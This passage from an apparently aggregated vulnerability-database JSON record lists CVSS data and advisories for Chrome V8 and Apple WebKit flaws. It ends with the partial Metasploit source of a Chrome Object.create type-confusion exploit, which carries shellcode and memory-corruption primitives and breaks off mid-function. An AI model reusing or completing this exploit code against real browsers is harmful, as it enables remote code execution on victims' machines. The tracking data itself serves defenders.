"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6217"], "modified": "2019-03-05T16:29:00", "id": "DEBIANCVE:CVE-2019-6217", "href": "https://security-tracker.debian.org/tracker/CVE-2019-6217", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:16", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-14T15:29:00", "type": "debiancve", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2018-11-14T15:29:00", "id": "DEBIANCVE:CVE-2018-17463", "href": "https://security-tracker.debian.org/tracker/CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T06:02:51", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T18:15:00", "type": "debiancve", "title": "CVE-2019-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2019-12-18T18:15:00", "id": "DEBIANCVE:CVE-2019-8518", "href": "https://security-tracker.debian.org/tracker/CVE-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T06:02:51", "description": "A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T18:29:00", "type": "debiancve", "title": "CVE-2018-4442", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4442"], "modified": "2019-04-03T18:29:00", "id": "DEBIANCVE:CVE-2018-4442", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4442", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T06:02:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-22T05:29:00", "type": "debiancve", "title": "CVE-2017-2505", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-22T05:29:00", "id": "DEBIANCVE:CVE-2017-2505", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2505", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T06:02:51", "description": "A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T18:29:00", "type": "debiancve", "title": "CVE-2018-4438", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2019-04-03T18:29:00", "id": "DEBIANCVE:CVE-2018-4438", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4438", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T06:02:50", "description": "An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2018-4122", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2018-4122", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4122", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T06:02:50", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. The issue involves the \"WebKit\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-07-20T16:29:00", "type": "debiancve", "title": "CVE-2017-7064", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-20T16:29:00", "id": "DEBIANCVE:CVE-2017-7064", "href": "https://security-tracker.debian.org/tracker/CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:16:19", "description": "A remote code execution vulnerability exists in Google Chrome V8. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome V8 Remote Code Execution (CVE-2018-17463)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-09-05T00:00:00", "id": "CPAI-2018-1597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:14:04", "description": "A memory corruption vulnerability exists in Apple. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-03T00:00:00", "type": "checkpoint_advisories", "title": "Apple Multiple Products Memory Corruption (CVE-2019-8518)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2020-07-03T00:00:00", "id": "CPAI-2019-2192", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:17:01", "description": "A use-after-free vulnerability exists in Apple WebKit. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-03-16T00:00:00", "type": "checkpoint_advisories", "title": "Apple WebKit Use After Free (CVE-2018-4442)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4442"], "modified": "2020-03-16T00:00:00", "id": "CPAI-2018-1320", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-09T19:56:17", "description": "A remote code execution vulnerability exists in Apple iOS, tvOS and Safari. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-27T00:00:00", "type": "checkpoint_advisories", "title": "Apple Webkit Remote Code Execution (CVE-2017-2505)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2020-02-27T00:00:00", "id": "CPAI-2017-1037", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:16:59", "description": "A memory corruption vulnerability exists in Apple WebKit. Successful exploitation of this vulnerability could allow attackers to execute code on the target system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-03-16T00:00:00", "type": "checkpoint_advisories", "title": "Apple Webkit Memory Corruption (CVE-2018-4438)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2020-03-16T00:00:00", "id": "CPAI-2018-1319", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:17:39", "description": "An authentication bypass vulnerability exists in Apple Webkit. Successful exploitation of this vulnerability could allow a remote attacker to gain access to a target system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2020-02-25T00:00:00", "type": "checkpoint_advisories", "title": "Apple Webkit Authentication Bypass (CVE-2017-7064)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2020-02-25T00:00:00", "id": "CPAI-2017-1038", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:19:29", "description": "An information disclosure vulnerability exists in Apple iMessage. Successful exploitation of this vulnerability would allow remote attackers to gain access to sensitive information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-09-02T00:00:00", "type": "checkpoint_advisories", "title": "Apple iMessage Information Disclosure (CVE-2019-8646)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8646"], "modified": "2019-10-03T00:00:00", "id": "CPAI-2019-1098", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "attackerkb": [{"lastseen": "2022-06-08T19:56:40", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-11-14T00:00:00", "type": "attackerkb", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-07-30T00:00:00", "id": "AKB:1FEA5875-DB2E-48AA-A4F4-0E24C3124828", "href": "https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-28T03:26:10", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "zdt", "title": "Google Chrome 67 / 68 / 69 Object.create Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-03-06T00:00:00", "id": "1337DAY-ID-34054", "href": "https://0day.today/exploit/description/34054", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\n 'Description' => %q{\n This modules exploits a type confusion in Google Chromes JIT compiler.\n The Object.create operation can be used to cause a type confusion between a\n PropertyArray and a NameDictionary.\n The payload is executed within the rwx region of the sandboxed renderer\n process, so the browser must be run with the --no-sandbox option for the\n payload to work.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo', # discovery and exploit\n 'timwr', # metasploit module\n ],\n 'References' => [\n ['CVE', '2018-17463'],\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => ['windows', 'osx'],\n 'DefaultTarget' => 0,\n 'Targets' => [ [ 'Automatic', { } ] ],\n 'DisclosureDate' => 'Sep 25 2018'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\n ])\n end\n\n def on_request_uri(cli, request)\n\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] \" + request.body)\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n\n jscript = %Q^\nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);\n\nlet ab = new ArrayBuffer(8);\nlet floatView = new Float64Array(ab);\nlet uint64View = new BigUint64Array(ab);\nlet uint8View = new Uint8Array(ab);\n\nNumber.prototype.toBigInt = function toBigInt() {\n floatView[0] = this;\n return uint64View[0];\n};\n\nBigInt.prototype.toNumber = function toNumber() {\n uint64View[0] = this;\n return floatView[0];\n};\n\nfunction hex(n) {\n return '0x' + n.toString(16);\n};\n\nfunction fail(s) {\n print('FAIL ' + s);\n throw null;\n}\n\nconst NUM_PROPERTIES = 32;\nconst MAX_ITERATIONS = 100000;\n\nfunction gc() {\n for (let i = 0; i < 200; i++) {\n new ArrayBuffer(0x100000);\n }\n}\n\nfunction make(properties) {\n let o = {inline: 42} // TODO\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n eval(`o.p${i} = properties[${i}];`);\n }\n return o;\n}\n\nfunction pwn() {\n function find_overlapping_properties() {\n let propertyNames = [];\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n propertyNames[i] = `p${i}`;\n }\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\n return [${propertyNames.join(', ')}];\n }\n `);\n\n let propertyValues = [];\n for (let i = 1; i < NUM_PROPERTIES; i++) {\n propertyValues[i] = -i;\n }\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n let r = vuln(make(propertyValues));\n if (r[1] !== -1) {\n for (let i = 1; i < r.length; i++) {\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\n return [i, -r[i]];\n }\n }\n }\n }\n\n fail(\"Failed to find overlapping properties\");\n }\n\n function addrof(obj) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n return 